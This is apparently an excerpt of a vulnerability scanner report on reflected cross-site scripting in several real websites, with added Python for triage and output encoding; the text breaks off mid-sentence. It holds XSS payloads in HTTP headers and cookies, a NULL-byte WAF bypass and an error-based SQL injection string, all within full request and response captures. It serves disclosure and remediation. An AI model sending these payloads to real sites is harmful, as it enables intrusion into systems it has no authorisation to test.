Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 20807


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=eda83"-alert(1)-"46677506f9c";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

5.126. https://www.supermedia.com/spportal/spportalFlow.do [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %008ca6b"-alert(1)-"9110dd52ec7 was submitted in the Referer HTTP header. This input was echoed as 8ca6b"-alert(1)-"9110dd52ec7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed that use client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /spportal/spportalFlow.do?_flowId=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trafficSource=default; CstrStatus=RVU; mbox=session#1301080493266-271579#1301082422|check#true#1301080622; undefined_s=First%20Visit
Referer: http://www.google.com/search?hl=en&q=%008ca6b"-alert(1)-"9110dd52ec7

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 25 Mar 2011 19:41:55 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 22982


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages
...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=%008ca6b"-alert(1)-"9110dd52ec7";
s.pageName="";
s.prop1="Processing Error Title";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="General Exception";
s.prop7="No such flow definition with id '(select 1 and row
...[SNIP]...

5.127. https://www.supermedia.com/spportal/spportalFlow.do [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac3d5"-alert(1)-"2bfe3cee0a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed that use client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /spportal/spportalFlow.do?_flowId=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trafficSource=default; CstrStatus=RVU
Referer: http://www.google.com/search?hl=en&q=ac3d5"-alert(1)-"2bfe3cee0a

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 25 Mar 2011 19:15:20 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 21861


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages
...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=ac3d5"-alert(1)-"2bfe3cee0a";
s.pageName="";
s.prop1="Processing Error Title";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="General Exception";
s.prop7="Badly formatted flow execution key ''||(utl_inaddr
...[SNIP]...

5.128. https://www.supermedia.com/spportal/spportalFlow.do [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d6bc"-alert(1)-"f4dec4eed60 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed that use client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /spportal/spportalFlow.do?fromPage=login&_flowId=loginact-flow HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Referer: 5d6bc"-alert(1)-"f4dec4eed60
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4487424B77C0217B5BAEF5DAE41C714C.app4-a2; trafficSource=default; CstrStatus=RVU; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b; mbox=session#1301080493266-271579#1301083848|check#true#1301082048; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response (redirected)

HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 25 Mar 2011 19:47:40 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 24596


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="5d6bc"-alert(1)-"f4dec4eed60";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

5.129. https://www.territoryahead.com/account/login/loginmain%20.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /account/login/loginmain%20.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload d915e--><script>alert(1)</script>15454db3650 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed that use client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /account/login/loginmain%20.jsp HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; PS_ALL=%23ps_catid%7Eaccount
Referer: http://www.google.com/search?hl=en&q=d915e--><script>alert(1)</script>15454db3650

Response

HTTP/1.1 404 Not Found
Date: Wed, 30 Mar 2011 17:34:53 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 36933


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
t; JSESSIONID=eDwn-UFCx4o7; s_cc=true; cmTPSet=Y; cmRS=t3=1301080538915&pi=ERROR; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301505878&v=3&e=1301507678363
Referer: http://www.google.com/search?hl=en&q=d915e--><script>alert(1)</script>15454db3650
UNIQUE_ID: mDkX8qwSrSgAAET8808AAAA5
SCRIPT_URL: /account/login/loginmain .jsp
SCRIPT_URI: https://www.territoryahead.com/account/login/loginmain .jsp
HTTPS: on

Cookies:
mmlID = 68
...[SNIP]...

5.130. https://www.territoryahead.com/account/login/loginmain%20.jsp [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /account/login/loginmain%20.jsp

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload b001b--><script>alert(1)</script>8cb69a80b72 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed that use client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /account/login/loginmain%20.jsp HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16b001b--><script>alert(1)</script>8cb69a80b72
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; PS_ALL=%23ps_catid%7Eaccount

Response

HTTP/1.1 404 Not Found
Date: Wed, 30 Mar 2011 17:26:02 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 36882


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
ers:
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16b001b--><script>alert(1)</script>8cb69a80b72
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: IS
...[SNIP]...

5.131. https://www.territoryahead.com/jump.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 3ba62--><script>alert(1)</script>19ec2497be6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed that use client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jump.jsp?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e
Referer: http://www.google.com/search?hl=en&q=3ba62--><script>alert(1)</script>19ec2497be6

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:27:09 GMT
Server: Apache
ETag: "AAAAS7ucUQm"
Last-Modified: Fri, 25 Mar 2011 19:15:23 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 38498


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
57cchr%28105%29%257c%257cchr%28108%29%257c%257cchr%28101%29%257c%257cchr%28109%29%257c%257cchr%28109%29%257c%257cchr%2897%29%29%252c25%29+from+dual%29
Referer: http://www.google.com/search?hl=en&q=3ba62--><script>alert(1)</script>19ec2497be6
UNIQUE_ID: lH5ufKwSrSgAAH2NuOoAAAAl
SCRIPT_URL: /jump.jsp
SCRIPT_URI: https://www.territoryahead.com/jump.jsp
HTTPS: on

Cookies:
mmlID = 68408168
CoreID6 = 8280633328661299090
...[SNIP]...

5.132. https://www.territoryahead.com/jump.jsp [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload 926e9--><script>alert(1)</script>5e35377ec36 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the reflected data arrives in a request header, the behaviour is not trivial to exploit against another user: the attacker needs a way to make the victim's browser send a request carrying an attacker-chosen User-Agent value. Client-side technologies such as Flash have in the past allowed arbitrary request headers to be set, and where such a technique is available it can be combined with this flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. In this case the sink is a diagnostic dump of the whole request (the request headers, the cookies, and server variables such as UNIQUE_ID, SCRIPT_URL, SCRIPT_URI and HTTPS) that the error page writes into a comment; the cookie findings for the same host below reflect through the same dump. Removing that dump from production error pages, or emitting it only when a server-side debug setting is on, closes all of these reflections at once; encoding each value before it is written into the comment is the fallback.

Request

GET /jump.jsp?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16926e9--><script>alert(1)</script>5e35377ec36
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:27:00 GMT
Server: Apache
ETag: "AAAAS7ucSNw"
Last-Modified: Fri, 25 Mar 2011 19:15:15 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 38447


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
ers:
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16926e9--><script>alert(1)</script>5e35377ec36
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: IS
...[SNIP]...

5.133. http://portal.smartertools.com/ST.ashx [siteuidut cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://portal.smartertools.com
Path:   /ST.ashx

Issue detail

The value of the siteuidut cookie is copied into a double-quoted JavaScript string literal (this.STVisitorValue = "...") in a response served as text/javascript, not into HTML text between tags as the scanner's context label suggests. The payload fe233<script>alert(1)</script>e5e34b07103 was submitted in the siteuidut cookie. This input was echoed unmodified in the application's response.

What the proof of concept establishes is that the cookie value is echoed without encoding. Because the reflection lands inside a string literal in a script resource, the <script> tags in the payload are inert; to run code from this position an attacker would also need a double quote, a backslash or a line terminator to be echoed unencoded, which this payload does not test. Confirm that before reporting the reflection as arbitrary script injection.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
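The context label above is the kind of thing worth re-checking by hand: the scanner reports a reflection into a JavaScript resource as "plain text between tags", and the payload's <script> tags are inert inside a string literal. The Python below is added here as an editorial example and is not part of the XSS.CX report or of any product it discusses. It classifies where the start of a payload lands in a response and whether the payload as sent can actually terminate that context. The three sample bodies are constructed from the snipped responses for 5.132, 5.133 and 5.134 (the last being the www.aol.com inline script reported later on this page); the function names and the context labels are this example's own.

```python
# Added example, not part of the original report: triage the context in
# which a reflected scanner payload lands, and whether the payload as sent
# can leave that context. Sample bodies are constructed from the snipped
# responses shown for 5.132, 5.133 and 5.134; names are this example's own.

JS_TYPES = {"text/javascript", "application/javascript", "application/x-javascript"}


def _open_js_quote(js_prefix: str):
    """Return the quote character of a string literal left open at the end
    of js_prefix, or None. Tracks backslash escapes only; good enough for
    triage, not a JavaScript tokenizer (comments and regex literals are
    not handled)."""
    quote = None
    i = 0
    while i < len(js_prefix):
        ch = js_prefix[i]
        if quote:
            if ch == "\\":
                i += 1              # skip the escaped character
            elif ch == quote:
                quote = None
        elif ch in "\"'`":
            quote = ch
        i += 1
    return quote


def reflection_context(body: str, marker: str, content_type: str) -> str:
    """Classify where the *start* of `marker` lands in `body`.

    Returns one of: not-reflected, html-comment, html-text, tag-attribute,
    inline-js-code, external-js-code, or inline-js-string:<q> /
    external-js-string:<q>, where <q> is the quote that opened the literal."""
    idx = body.find(marker)
    if idx < 0:
        return "not-reflected"
    prefix = body[:idx]
    mime = content_type.split(";")[0].strip().lower()
    if mime in JS_TYPES:                       # the whole response is script
        q = _open_js_quote(prefix)
        return f"external-js-string:{q}" if q else "external-js-code"
    low = prefix.lower()
    # innermost enclosing construct wins: comment, then <script>, then tag
    c = low.rfind("<!--")
    if c >= 0 and low.find("-->", c) < 0:
        return "html-comment"
    s = low.rfind("<script")
    if s >= 0 and low.find("</script", s) < 0:
        tag_end = low.find(">", s)
        if tag_end < 0:
            return "tag-attribute"             # inside the <script ...> tag itself
        q = _open_js_quote(prefix[tag_end + 1:])
        return f"inline-js-string:{q}" if q else "inline-js-code"
    if prefix.rfind("<") > prefix.rfind(">"):
        return "tag-attribute"
    return "html-text"


def payload_escapes_context(context: str, payload: str) -> bool:
    """True if `payload` contains a sequence that terminates `context`.
    False means the reflection needs further probing (does the application
    also echo a quote or a backslash?) before it is reported as exploitable."""
    kind, _, quote = context.partition(":")
    if kind in ("inline-js-code", "external-js-code"):
        return True                            # already in executable position
    if kind in ("inline-js-string", "external-js-string"):
        if any(s in payload for s in (quote, "\\", "\n", "\r")):
            return True
        # </script> ends an inline block whatever the quoting; it is
        # irrelevant for a response served as JavaScript in its own right
        return kind == "inline-js-string" and "</script" in payload.lower()
    terminators = {
        "html-comment": ("-->", "--!>"),
        "html-text": ("<",),
        "tag-attribute": ('"', "'", ">"),
    }
    return any(s in payload for s in terminators.get(kind, ()))


# Constructed fragments modelled on the report's snipped responses.
TERRITORYAHEAD_500 = (
    "<html><head><title>Error</title></head><body>\n"
    "<!--\nHeaders:\nHost: www.territoryahead.com\n"
    "User-Agent: Mozilla/5.0 926e9--><script>alert(1)</script>5e35377ec36\n"
    "-->\n</body></html>"
)
SMARTERTOOLS_JS = (
    'this.STVisitorValue = "1dad4e31be764ea7b431d43fbac2942b'
    'fe233<script>alert(1)</script>e5e34b07103";this.STCallbackInterval = 8000;'
)
AOL_HTML = (
    '<html><body><script type="text/javascript">\n'
    'var dlImps = new Array();dlImps["dl1"]=true;\n'
    'var dlact = "dl3e131d"-alert(1)-"4408da0b00a";\n'
    "var dlduration = 10000;\n</script></body></html>"
)

if __name__ == "__main__":
    for name, body, marker, ctype in (
        ("5.132", TERRITORYAHEAD_500, '926e9--><script>alert(1)</script>5e35377ec36', "text/html;charset=UTF-8"),
        ("5.133", SMARTERTOOLS_JS, 'fe233<script>alert(1)</script>e5e34b07103', "text/javascript"),
        ("5.134", AOL_HTML, 'e131d"-alert(1)-"4408da0b00a', "text/html;;charset=utf-8"),
    ):
        ctx = reflection_context(body, marker, ctype)
        print(name, ctx, "breaks out" if payload_escapes_context(ctx, marker) else "needs more probing")
```

Run against the three constructed bodies, 5.132 and 5.134 break out of their contexts while 5.133 comes back as external-js-string:" with "needs more probing", which is the right triage result: the next step there is a payload carrying a double quote, a backslash or a newline, not a report of arbitrary script injection.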

Request

GET /ST.ashx?scriptonly=true HTTP/1.1
Host: portal.smartertools.com
Proxy-Connection: keep-alive
Referer: http://forums.smartertools.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: siteuidut=1dad4e31be764ea7b431d43fbac2942bfe233<script>alert(1)</script>e5e34b07103; __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=61502381.1300551951.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); uidut=6488571; __utma=134836083.1670938407.1300551915.1300551915.1300554519.2; __utma=61502381.1558309378.1300551951.1300557309.1300912321.4

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 16:43:40 GMT
Content-Length: 33118

this.STVisitorValue = "1dad4e31be764ea7b431d43fbac2942bfe233<script>alert(1)</script>e5e34b07103";this.STCallbackInterval = 8000;this.STHandlerFile = "ST.ashx";this.STStopCallbackAfterMs = 900000;this.STLastCallbackImageHeight = 0;
this.STLastCallbackAction = 0;
this.STTimeoutID = 0;
this.STPo
...[SNIP]...

5.134. http://www.aol.com/ [dlact cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /

Issue detail

The value of the dlact cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e131d"-alert(1)-"4408da0b00a was submitted in the dlact cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must reach script, emit it as a JSON string literal with the double quote and the backslash escaped and with <, > and & written as \u00XX escapes, so that neither the literal nor the enclosing <script> block can be terminated; or place the value in an entity-encoded HTML attribute and read it from script at runtime.
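For both sink types seen on this page, the HTML comment of 5.132 and the double-quoted JavaScript string of 5.134, the fix is output encoding chosen for the exact context, or not emitting the data at all. The Python below is an added example and not code from the report or from the sites it lists: comment_safe, js_string_literal, render_dlact_script and render_diagnostic_comment are illustrative names, and the debug flag in render_diagnostic_comment stands in for whatever server-side setting would govern a request dump in production.

```python
import html
import json

# Added example (not from the report): context-specific output encoding for
# the two sinks seen on this page, an HTML comment (5.132) and a double-quoted
# JavaScript string (5.134). Function names are this example's own.


def comment_safe(value: str) -> str:
    """Neutralise untrusted text destined for an HTML comment.

    A comment ends at '-->' (HTML5 also accepts '--!>'), so the essential
    step is to make sure no '>' survives; html.escape does that and also
    covers '<' and '&'. Entities are not decoded inside comments, so the
    text stays inert. Collapsing '--' keeps the comment valid HTML too."""
    escaped = html.escape(value, quote=False)
    while "--" in escaped:
        escaped = escaped.replace("--", "-")
    return escaped


def js_string_literal(value: str) -> str:
    """Return a double-quoted JavaScript string literal for `value`.

    json.dumps escapes '"', '\\' and control characters, and with its default
    ensure_ascii=True also the U+2028/U+2029 line terminators. The extra
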